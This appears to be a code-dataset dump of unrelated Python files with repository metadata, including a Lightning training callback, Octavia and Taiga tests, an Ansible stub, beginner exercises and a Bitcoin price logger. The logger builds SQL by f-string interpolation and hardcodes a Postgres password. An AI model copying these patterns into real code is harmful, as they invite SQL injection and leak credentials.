if value is not None:
break
else:
raise RefineryCriticalException('Received empty match.')
return self.labelled(value, kind=name)
yield from self.matches_filtered(memoryview(data), pattern, check)
| true
| true
|
790dcdff0a0df3dd5d7ac7d87dc2aa691f1779d3
| 3,132
|
py
|
Python
|
finite_element_networks/lightning/callbacks.py
|
martenlienen/finite-element-networks
|
5e8f6ecc473d1e93ccf366fcc45a47b08492ffde
|
[
"MIT"
] | 5
|
2022-03-21T12:39:01.000Z
|
2022-03-31T06:02:01.000Z
|
finite_element_networks/lightning/callbacks.py
|
martenlienen/finite-element-networks
|
5e8f6ecc473d1e93ccf366fcc45a47b08492ffde
|
[
"MIT"
] | null | null | null |
finite_element_networks/lightning/callbacks.py
|
martenlienen/finite-element-networks
|
5e8f6ecc473d1e93ccf366fcc45a47b08492ffde
|
[
"MIT"
] | 1
|
2022-03-26T02:58:58.000Z
|
2022-03-26T02:58:58.000Z
|
import pytorch_lightning as pl
from pytorch_lightning.utilities.parsing import lightning_getattr, lightning_setattr
class MultipleShootingCallback(pl.Callback):
"""This callback increases the length of the training sequences each epoch.
This technique is well known in the SciML community and documented in their tutorials
[1] as a way to avoid falling into local minima when training ODE based models. We can
also see this as an instance of multiple shooting [2, 3] in the data space, where the
penalty function enforcing the equality constraints at the splitting points is equal
to the loss function.
Note that the number of target steps will never increase over the initial number of
target steps configured in the data module.
[1] https://diffeqflux.sciml.ai/dev/examples/local_minima/
[2] https://diffeqflux.sciml.ai/dev/examples/multiple_shooting/
[3] Evren Mert Turan, Johannes Jäschke, "Multiple shooting for training neural
differential equations on time series", https://arxiv.org/abs/2109.06786
Attributes
----------
initial_steps
Number of target steps in the first epoch
increase
The target steps increase by this much in each following epoch
target_steps_attr
Name of the data module attribute that should be modified
"""
def __init__(
self,
*,
initial_steps: int = 3,
increase: int = 1,
target_steps_attr: str = "train_target_steps",
):
super().__init__()
self.initial_steps = initial_steps
self.increase = increase
self.target_steps_attr = target_steps_attr
self.initial_target_steps = None
def on_train_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
self.initial_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
# Set the initial steps in this hook because the trainer selects the train
# dataloader internally before train_epoch_start is called.
lightning_setattr(pl_module, self.target_steps_attr, self.initial_steps)
trainer.reset_train_dataloader(pl_module)
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
pl_module.log(
self.target_steps_attr,
float(lightning_getattr(pl_module, self.target_steps_attr)),
on_step=False,
on_epoch=True,
)
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
# Trainer loads the data loader before the train_epoch_start hook is called, so we
# set the target steps already at the end of the previous epoch
prev_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
target_steps = prev_target_steps + self.increase
if self.initial_target_steps is not None:
target_steps = min(target_steps, self.initial_target_steps)
if target_steps != prev_target_steps:
lightning_setattr(pl_module, self.target_steps_attr, target_steps)
trainer.reset_train_dataloader(pl_module)
| 43.5
| 90
| 0.715837
|
import pytorch_lightning as pl
from pytorch_lightning.utilities.parsing import lightning_getattr, lightning_setattr
class MultipleShootingCallback(pl.Callback):
def __init__(
self,
*,
initial_steps: int = 3,
increase: int = 1,
target_steps_attr: str = "train_target_steps",
):
super().__init__()
self.initial_steps = initial_steps
self.increase = increase
self.target_steps_attr = target_steps_attr
self.initial_target_steps = None
def on_train_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
self.initial_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
lightning_setattr(pl_module, self.target_steps_attr, self.initial_steps)
trainer.reset_train_dataloader(pl_module)
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
pl_module.log(
self.target_steps_attr,
float(lightning_getattr(pl_module, self.target_steps_attr)),
on_step=False,
on_epoch=True,
)
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
prev_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
target_steps = prev_target_steps + self.increase
if self.initial_target_steps is not None:
target_steps = min(target_steps, self.initial_target_steps)
if target_steps != prev_target_steps:
lightning_setattr(pl_module, self.target_steps_attr, target_steps)
trainer.reset_train_dataloader(pl_module)
| true
| true
|
790dceeee3e32779d9ead14d2c0c4b5ea90fb07e
| 1,946
|
py
|
Python
|
zuul.d/octavia/tests/unit/common/test_config.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/tests/unit/common/test_config.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/tests/unit/common/test_config.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014, Doug Wiegley, A10 Networks.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
import octavia.common.config as config
import octavia.tests.unit.base as base
class TestConfig(base.TestCase):
def test_sanity(self):
config.init([])
config.setup_logging(cfg.CONF)
# Resetting because this will cause inconsistent errors when run with
# other tests
self.addCleanup(cfg.CONF.reset)
def test_validate_server_certs_key_passphrase(self):
conf = self.useFixture(oslo_fixture.Config(config.cfg.CONF))
conf.config(
group="certificates",
server_certs_key_passphrase="insecure-key-do-not-use-this-key"
)
# Test too short
self.assertRaises(ValueError, conf.config,
group="certificates",
server_certs_key_passphrase="short_passphrase")
# Test too long
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="long-insecure-key-do-not-use-this")
# Test invalid characters
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="insecure-key-do-not-u$e-this-key")
| 37.423077
| 79
| 0.660843
|
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
import octavia.common.config as config
import octavia.tests.unit.base as base
class TestConfig(base.TestCase):
def test_sanity(self):
config.init([])
config.setup_logging(cfg.CONF)
self.addCleanup(cfg.CONF.reset)
def test_validate_server_certs_key_passphrase(self):
conf = self.useFixture(oslo_fixture.Config(config.cfg.CONF))
conf.config(
group="certificates",
server_certs_key_passphrase="insecure-key-do-not-use-this-key"
)
self.assertRaises(ValueError, conf.config,
group="certificates",
server_certs_key_passphrase="short_passphrase")
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="long-insecure-key-do-not-use-this")
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="insecure-key-do-not-u$e-this-key")
| true
| true
|
790dd0e09ae1d8a6244aea4ae0d4ef34ef667fe1
| 771
|
py
|
Python
|
server/models/bitcoin_price_API.py
|
johnjdailey/JS-Realtime-Dashboard
|
aa62cab32096fbd4bdb8be657dd99d3d162e7097
|
[
"MIT"
] | null | null | null |
server/models/bitcoin_price_API.py
|
johnjdailey/JS-Realtime-Dashboard
|
aa62cab32096fbd4bdb8be657dd99d3d162e7097
|
[
"MIT"
] | null | null | null |
server/models/bitcoin_price_API.py
|
johnjdailey/JS-Realtime-Dashboard
|
aa62cab32096fbd4bdb8be657dd99d3d162e7097
|
[
"MIT"
] | null | null | null |
import requests
from datetime import datetime
import psycopg2
import time
def setup():
# Create database connection
conn = psycopg2.connect(database="postgres", user="postgres",
password="password", host="127.0.0.1", port="5432")
return conn
def call_api():
URL = "https://api.coindesk.com/v1/bpi/currentprice.json"
conn = setup()
while 1:
r = requests.get(url=URL)
current_time = datetime.now()
data = r.json()
price = data["bpi"]["USD"]["rate_float"]
cur = conn.cursor()
cur.execute(
f"INSERT INTO BT_Price (Created_at,Price) VALUES ('{str(current_time)}', {price})")
conn.commit()
time.sleep(15)
if __name__ == "__main__":
call_api()
| 24.870968
| 95
| 0.597925
|
import requests
from datetime import datetime
import psycopg2
import time
def setup():
conn = psycopg2.connect(database="postgres", user="postgres",
password="password", host="127.0.0.1", port="5432")
return conn
def call_api():
URL = "https://api.coindesk.com/v1/bpi/currentprice.json"
conn = setup()
while 1:
r = requests.get(url=URL)
current_time = datetime.now()
data = r.json()
price = data["bpi"]["USD"]["rate_float"]
cur = conn.cursor()
cur.execute(
f"INSERT INTO BT_Price (Created_at,Price) VALUES ('{str(current_time)}', {price})")
conn.commit()
time.sleep(15)
if __name__ == "__main__":
call_api()
| true
| true
|
790dd1c98aa84804fd6deae9806710c465315553
| 528
|
py
|
Python
|
ex009a.py
|
emerfelippini/Curso_em_video-Aulas_Python
|
5b1d78b259732bb9bbad27cd30ce91bba77c5ef0
|
[
"MIT"
] | null | null | null |
ex009a.py
|
emerfelippini/Curso_em_video-Aulas_Python
|
5b1d78b259732bb9bbad27cd30ce91bba77c5ef0
|
[
"MIT"
] | null | null | null |
ex009a.py
|
emerfelippini/Curso_em_video-Aulas_Python
|
5b1d78b259732bb9bbad27cd30ce91bba77c5ef0
|
[
"MIT"
] | null | null | null |
a = int(input('Digite um número para saber sua tabuada :'))
n1 = a*1
n2 = a*2
n3 = a*3
n4 = a*4
n5 = a*5
n6 = a*6
n7 = a*7
n8 = a*8
n9 = a*9
n10 = a*10
print('A sua tabuada é')
print('{} x 1 = {}'.format(a, n1))
print('{} x 2 = {}'.format(a, n2))
print('{} x 3 = {}'.format(a, n3))
print('{} x 4 = {}'.format(a, n4))
print('{} x 5 = {}'.format(a, n5))
print('{} x 6 = {}'.format(a, n6))
print('{} x 7 = {}'.format(a, n7))
print('{} x 8 = {}'.format(a, n8))
print('{} x 9 = {}'.format(a, n9))
print('{} x 10 = {}'.format(a, n10))
| 24
| 59
| 0.498106
|
a = int(input('Digite um número para saber sua tabuada :'))
n1 = a*1
n2 = a*2
n3 = a*3
n4 = a*4
n5 = a*5
n6 = a*6
n7 = a*7
n8 = a*8
n9 = a*9
n10 = a*10
print('A sua tabuada é')
print('{} x 1 = {}'.format(a, n1))
print('{} x 2 = {}'.format(a, n2))
print('{} x 3 = {}'.format(a, n3))
print('{} x 4 = {}'.format(a, n4))
print('{} x 5 = {}'.format(a, n5))
print('{} x 6 = {}'.format(a, n6))
print('{} x 7 = {}'.format(a, n7))
print('{} x 8 = {}'.format(a, n8))
print('{} x 9 = {}'.format(a, n9))
print('{} x 10 = {}'.format(a, n10))
| true
| true
|
790dd28cf200f8e4925057ba449528fba67df010
| 158
|
py
|
Python
|
projects/constants.py
|
IdmFoundInHim/streamsort
|
d55bdebd0c84d035affe087892712cf3e26974e5
|
[
"MIT"
] | null | null | null |
projects/constants.py
|
IdmFoundInHim/streamsort
|
d55bdebd0c84d035affe087892712cf3e26974e5
|
[
"MIT"
] | 13
|
2020-04-30T20:55:17.000Z
|
2021-08-23T04:02:51.000Z
|
projects/constants.py
|
IdmFoundInHim/streamsort
|
d55bdebd0c84d035affe087892712cf3e26974e5
|
[
"MIT"
] | null | null | null |
""" StreamSort Projects Extension -- Constants
Copyright (c) 2021 IdmFoundInHim, under MIT License
"""
SINGLE_MAX_MS = 15 * 60 * 1000
SINGLE_MAX_TRACKS = 4
| 22.571429
| 51
| 0.740506
|
SINGLE_MAX_MS = 15 * 60 * 1000
SINGLE_MAX_TRACKS = 4
| true
| true
|
790dd2ae5bdef111d96c5fc9702a39c1ef79d422
| 611
|
py
|
Python
|
bonus2/collateral/modules/library/test_module.py
|
kinther/ansible_course
|
5ff96b857d7b1ddb359526fed128feefba8ebb90
|
[
"Apache-2.0"
] | 14
|
2020-01-24T21:52:51.000Z
|
2021-05-24T01:58:08.000Z
|
bonus2/collateral/modules/library/test_module.py
|
kinther/ansible_course
|
5ff96b857d7b1ddb359526fed128feefba8ebb90
|
[
"Apache-2.0"
] | null | null | null |
bonus2/collateral/modules/library/test_module.py
|
kinther/ansible_course
|
5ff96b857d7b1ddb359526fed128feefba8ebb90
|
[
"Apache-2.0"
] | 26
|
2020-03-29T20:17:29.000Z
|
2022-03-28T19:13:40.000Z
|
#!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
def main():
# Define your modules arguments
module_args = dict(
name=dict(type="str", required=True),
new=dict(type="bool", required=False, default=False),
)
# Create an instance of the AnsibleModule class
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
# Define standard results
result = dict(changed=False, original_message="Something", message="It worked!!!")
# Return items as JSON
module.exit_json(**result)
if __name__ == "__main__":
main()
| 23.5
| 86
| 0.690671
|
from ansible.module_utils.basic import AnsibleModule
def main():
module_args = dict(
name=dict(type="str", required=True),
new=dict(type="bool", required=False, default=False),
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
result = dict(changed=False, original_message="Something", message="It worked!!!")
module.exit_json(**result)
if __name__ == "__main__":
main()
| true
| true
|
790dd3a146c61c8a59d268a9ef30aafa08803c2b
| 3,543
|
py
|
Python
|
dict_interdiff.py
|
Zafara1/MITx-6.00.1x
|
7ab0e5e188fae86685033954e774dfe07e03a639
|
[
"MIT"
] | null | null | null |
dict_interdiff.py
|
Zafara1/MITx-6.00.1x
|
7ab0e5e188fae86685033954e774dfe07e03a639
|
[
"MIT"
] | null | null | null |
dict_interdiff.py
|
Zafara1/MITx-6.00.1x
|
7ab0e5e188fae86685033954e774dfe07e03a639
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 08:23:08 2017
Author: Zachary W. Mikus
"""
#These are testing variables
d1 = {1:30, 2:20, 3:30, 5:80}
d2 = {1:40, 2:50, 3:60, 4:70}
def f(x, y):
k = x + y
return k
def commonKeys(longerList, shorterList):
commonKeyList = []
#Variables
#intersectDictionary = The final returned intersect dictionary
#commonKeyList = The list of keys that appear in both dictionaries
for i in range(len(longerList)):
if longerList[i] in shorterList:
commonKeyList.append(longerList[i])
return commonKeyList
def differentKeys(longerList, shorterList):
#This function uses similar logic to the commonKeys function
#Except it will see if the index is NOT in the other list and remove it
#This runs the loop twice once through each loop to find the missing numbers
#in each list
differentKeyList = []
for i in range(len(longerList)):
if longerList[i] not in shorterList:
differentKeyList.append(longerList[i])
for i in range(len(shorterList)):
if shorterList[i] not in longerList:
differentKeyList.append(shorterList[i])
return differentKeyList
def intersect(commonList, d1, d2):
intersectDict = {}
#This function takes the common list of keys, grabs the common values in
#both dictionaries and performs the f(x, y) function on them
for i in range(len(commonList)):
#currentIndex is the index in the dictionary, it will move
currentIndex = commonList[i]
x = d1[currentIndex]
y = d2[currentIndex]
functionValue = f(x, y)
intersectDict[currentIndex] = functionValue
return intersectDict
def difference(differentKeyList, d1, d2):
differenceDict = {}
#This function takes the different list of keys, grabs the relevant values and
#creates a dictionary
#searches d
for i in range(len(differentKeyList)):
currentIndex = differentKeyList[i]
if currentIndex in d1:
differenceDict[currentIndex] = d1[currentIndex]
if currentIndex in d2:
differenceDict[currentIndex] = d2[currentIndex]
return differenceDict
def diff_dictionary(d1, d2):
differentKeyList = []
#Turns key values in lists and finds the longest
#keyListD1 = list of keys in d1
#keyListD2 = list of keys in d2
keyListD1 = list(d1.keys())
keyListD2 = list(d2.keys())
#determines which of the two lists is the longest and assigned it values
#for the common list function
if len(keyListD1) > len(keyListD2):
longerList = keyListD1
shorterList = keyListD2
else:
longerList = keyListD2
shorterList = keyListD1
#Finds the common keys
commonList = commonKeys(longerList, shorterList)
#Makes the intersect dictionary
intersectDict = intersect(commonList, d1, d2)
#Finds the different keys
differentKeyList = differentKeys(longerList, shorterList)
#Makes the different key dictionary
differenceDict = difference(differentKeyList, d1, d2)
#This now creates a list of the dictionaries put together
return (intersectDict, differenceDict)
'''
#This is for calculating the difference dictionary.
#The difference dictionary consists of every
#KEY VALUE# in the dictionaries that does not exist
#in the other dictionary.
'''
#Variables
#differenceDictionary = The final returned difference dictionary
print(diff_dictionary(d1, d2))
| 31.633929
| 82
| 0.686988
|
d1 = {1:30, 2:20, 3:30, 5:80}
d2 = {1:40, 2:50, 3:60, 4:70}
def f(x, y):
k = x + y
return k
def commonKeys(longerList, shorterList):
commonKeyList = []
for i in range(len(longerList)):
if longerList[i] in shorterList:
commonKeyList.append(longerList[i])
return commonKeyList
def differentKeys(longerList, shorterList):
differentKeyList = []
for i in range(len(longerList)):
if longerList[i] not in shorterList:
differentKeyList.append(longerList[i])
for i in range(len(shorterList)):
if shorterList[i] not in longerList:
differentKeyList.append(shorterList[i])
return differentKeyList
def intersect(commonList, d1, d2):
intersectDict = {}
for i in range(len(commonList)):
currentIndex = commonList[i]
x = d1[currentIndex]
y = d2[currentIndex]
functionValue = f(x, y)
intersectDict[currentIndex] = functionValue
return intersectDict
def difference(differentKeyList, d1, d2):
differenceDict = {}
for i in range(len(differentKeyList)):
currentIndex = differentKeyList[i]
if currentIndex in d1:
differenceDict[currentIndex] = d1[currentIndex]
if currentIndex in d2:
differenceDict[currentIndex] = d2[currentIndex]
return differenceDict
def diff_dictionary(d1, d2):
differentKeyList = []
keyListD1 = list(d1.keys())
keyListD2 = list(d2.keys())
if len(keyListD1) > len(keyListD2):
longerList = keyListD1
shorterList = keyListD2
else:
longerList = keyListD2
shorterList = keyListD1
commonList = commonKeys(longerList, shorterList)
intersectDict = intersect(commonList, d1, d2)
differentKeyList = differentKeys(longerList, shorterList)
differenceDict = difference(differentKeyList, d1, d2)
return (intersectDict, differenceDict)
print(diff_dictionary(d1, d2))
| true
| true
|
790dd3e88fd0cb334c6be5fcb08e85a2cb6784e1
| 7,245
|
py
|
Python
|
docker-images/taigav2/taiga-back/tests/integration/test_stats.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | 1
|
2017-05-29T19:01:06.000Z
|
2017-05-29T19:01:06.000Z
|
docker-images/taigav2/taiga-back/tests/integration/test_stats.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | null | null | null |
docker-images/taigav2/taiga-back/tests/integration/test_stats.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# Copyright (C) 2014-2016 Anler Hernández <hello@anler.me>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
from .. import factories as f
from tests.utils import disconnect_signals, reconnect_signals
from taiga.projects.services.stats import get_stats_for_project
pytestmark = pytest.mark.django_db
def setup_module(module):
disconnect_signals()
def teardown_module(module):
reconnect_signals()
@pytest.fixture
def data():
m = type("Models", (object,), {})
m.user = f.UserFactory.create()
m.project = f.ProjectFactory(is_private=False, owner=m.user)
m.role1 = f.RoleFactory(project=m.project)
m.role2 = f.RoleFactory(project=m.project)
m.null_points = f.PointsFactory(project=m.project, value=None)
m.default_points = f.PointsFactory(project=m.project, value=0)
m.points1 = f.PointsFactory(project=m.project, value=1)
m.points2 = f.PointsFactory(project=m.project, value=2)
m.points3 = f.PointsFactory(project=m.project, value=4)
m.points4 = f.PointsFactory(project=m.project, value=8)
m.points5 = f.PointsFactory(project=m.project, value=16)
m.points6 = f.PointsFactory(project=m.project, value=32)
m.open_status = f.UserStoryStatusFactory(is_closed=False)
m.closed_status = f.UserStoryStatusFactory(is_closed=True)
m.project.default_points = m.default_points
m.project.save()
m.user_story1 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story1.role_points.filter(role=m.role1).update(points=m.points1)
m.user_story2 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story2.role_points.filter(role=m.role1).update(points=m.points2)
m.user_story3 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story3.role_points.filter(role=m.role1).update(points=m.points3)
m.user_story4 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story4.role_points.filter(role=m.role1).update(points=m.points4)
# 5 and 6 are inclosed milestones
m.user_story5 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story5.role_points.filter(role=m.role1).update(points=m.points5)
m.user_story6 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story6.role_points.filter(role=m.role1).update(points=m.points6)
return m
def test_project_defined_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
data.user_story1.role_points.filter(role=data.role1).update(points=data.default_points)
data.user_story1.role_points.filter(role=data.role2).update(points=data.points1)
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 62, data.role2.pk: 1}
def test_project_closed_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {}
data.user_story1.is_closed = True
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 1, data.role2.pk: 0}
data.user_story2.is_closed = True
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 3, data.role2.pk: 0}
data.user_story3.is_closed = True
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 7, data.role2.pk: 0}
data.user_story4.is_closed = True
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 15, data.role2.pk: 0}
data.user_story5.is_closed = True
data.user_story5.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 31, data.role2.pk: 0}
data.user_story6.is_closed = True
data.user_story6.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points"] == 63
assert project_stats["speed"] == 24
def test_project_assigned_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 48, data.role2.pk: 0}
data.user_story1.milestone = data.user_story6.milestone
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 49, data.role2.pk: 0}
data.user_story2.milestone = data.user_story6.milestone
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 51, data.role2.pk: 0}
data.user_story3.milestone = data.user_story6.milestone
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 55, data.role2.pk: 0}
data.user_story4.milestone = data.user_story6.milestone
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
| 44.447853
| 93
| 0.696894
|
import pytest
from .. import factories as f
from tests.utils import disconnect_signals, reconnect_signals
from taiga.projects.services.stats import get_stats_for_project
pytestmark = pytest.mark.django_db
def setup_module(module):
disconnect_signals()
def teardown_module(module):
reconnect_signals()
@pytest.fixture
def data():
m = type("Models", (object,), {})
m.user = f.UserFactory.create()
m.project = f.ProjectFactory(is_private=False, owner=m.user)
m.role1 = f.RoleFactory(project=m.project)
m.role2 = f.RoleFactory(project=m.project)
m.null_points = f.PointsFactory(project=m.project, value=None)
m.default_points = f.PointsFactory(project=m.project, value=0)
m.points1 = f.PointsFactory(project=m.project, value=1)
m.points2 = f.PointsFactory(project=m.project, value=2)
m.points3 = f.PointsFactory(project=m.project, value=4)
m.points4 = f.PointsFactory(project=m.project, value=8)
m.points5 = f.PointsFactory(project=m.project, value=16)
m.points6 = f.PointsFactory(project=m.project, value=32)
m.open_status = f.UserStoryStatusFactory(is_closed=False)
m.closed_status = f.UserStoryStatusFactory(is_closed=True)
m.project.default_points = m.default_points
m.project.save()
m.user_story1 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story1.role_points.filter(role=m.role1).update(points=m.points1)
m.user_story2 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story2.role_points.filter(role=m.role1).update(points=m.points2)
m.user_story3 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story3.role_points.filter(role=m.role1).update(points=m.points3)
m.user_story4 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story4.role_points.filter(role=m.role1).update(points=m.points4)
m.user_story5 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story5.role_points.filter(role=m.role1).update(points=m.points5)
m.user_story6 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story6.role_points.filter(role=m.role1).update(points=m.points6)
return m
def test_project_defined_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
data.user_story1.role_points.filter(role=data.role1).update(points=data.default_points)
data.user_story1.role_points.filter(role=data.role2).update(points=data.points1)
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 62, data.role2.pk: 1}
def test_project_closed_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {}
data.user_story1.is_closed = True
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 1, data.role2.pk: 0}
data.user_story2.is_closed = True
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 3, data.role2.pk: 0}
data.user_story3.is_closed = True
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 7, data.role2.pk: 0}
data.user_story4.is_closed = True
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 15, data.role2.pk: 0}
data.user_story5.is_closed = True
data.user_story5.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 31, data.role2.pk: 0}
data.user_story6.is_closed = True
data.user_story6.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points"] == 63
assert project_stats["speed"] == 24
def test_project_assigned_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 48, data.role2.pk: 0}
data.user_story1.milestone = data.user_story6.milestone
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 49, data.role2.pk: 0}
data.user_story2.milestone = data.user_story6.milestone
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 51, data.role2.pk: 0}
data.user_story3.milestone = data.user_story6.milestone
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 55, data.role2.pk: 0}
data.user_story4.milestone = data.user_story6.milestone
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
| true
| true
|
790dd55b6ff7676f8e99726f40e97383ef46a967
| 35,128
|
py
|
Python
|
Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/contrib/rnn/ops/gen_lstm_ops.py
|
JustinACoder/H22-GR3-UnrealAI
|
361eb9ef1147f8a2991e5f98c4118cd823184adf
|
[
"MIT"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Lib/site-packages/tensorflow/contrib/rnn/ops/gen_lstm_ops.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/contrib/rnn/ops/gen_lstm_ops.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
